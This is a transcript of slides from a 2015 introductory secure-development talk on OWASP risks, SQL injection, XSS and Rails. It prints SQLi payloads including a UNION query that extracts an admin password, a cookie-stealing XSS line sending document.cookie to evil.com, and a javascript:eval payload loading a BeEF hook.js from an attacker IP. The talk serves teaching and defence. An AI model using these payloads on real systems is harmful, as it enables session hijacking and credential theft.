Don't Do what Derpy the Dreadful Dev Does
-
Upload
liam-osaurus -
Category
Technology
-
view
382 -
download
3
Transcript of Don't Do what Derpy the Dreadful Dev Does
Don’t Do what Derpy The Dreadful Dev Does
(also - don’t let “friends” on IRC decide on your talk title)
Secure Development Melbourne, 11/06/2015
whoami
• @liamosaur
• Penetration Tester / Consultant with Assurance
• Previously: C# / Java developer
The Brief• Basic, Introductory Level talk
about security
• Establish some common ground between the Infosec and Dev world
OWASP Top 5/10
1. Injection (SQLi, Command injection, XXE, LDAPi etc)
2. Broken Auth / Session Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
SQLi basics
• Inject user controlled content into dynamic SQL queries, allowing unintended access/control of database
SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";
• Input: liamo
• SQL: SELECT username FROM users WHERE username=‘liamo’
• Query result: liamo
SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";
• Input: ' OR 'a'='a
• SQL: SELECT username FROM users WHERE username=‘' OR ‘a'='a’
• Query result: list of all users
SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";
• Input: liamo' UNION SELECT password FROM users WHERE username='admin
• SQL: SELECT username FROM users WHERE username=‘liamo' UNION SELECT password FROM users WHERE username='admin’
• Query result: liamo and the admin password
Cross-Site Scripting (XSS)
• Inject user controlled content into dynamic web content, allowing unintended access/control within a target browser
XSS Basics• HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></html>
• Input: Liam
• Output: Hello, Liam!
XSS Basics• HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></html>
• Input: Liam<script>alert(1)</script>
• Output:
XSS - Who cares?• Old school - cookie stealing • http://evil.com/cookies.php?
+escape(document.cookie)
• Steal session ID - game over
• Less effective thanks to httpOnly cookie flag
Rails
• Problem #1 - I don’t know Rails
• Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
Rails• Learned Rails. Wrote a basic app
• Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
Rubby XSS• Challenge for those playing at home:
some up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x(){var a = document.createElement('script');a.setAttribute('src','http://192.168.57.159:3000/hook.js');document.head.appendChild(a);};x();");
BeEF Tunnelling ProxyBeEF SERVER
(http proxy)
Phish with XSS hook.js
Attackers Browser
Victims Browser
(XHR proxy)
Target server (same domain as
XSS phish)
Frameworks/Languages• PHP
• Good: PHP devs know they need to take security into account
• Ruby on Rails
• Bad: “The framework takes care of security for me!”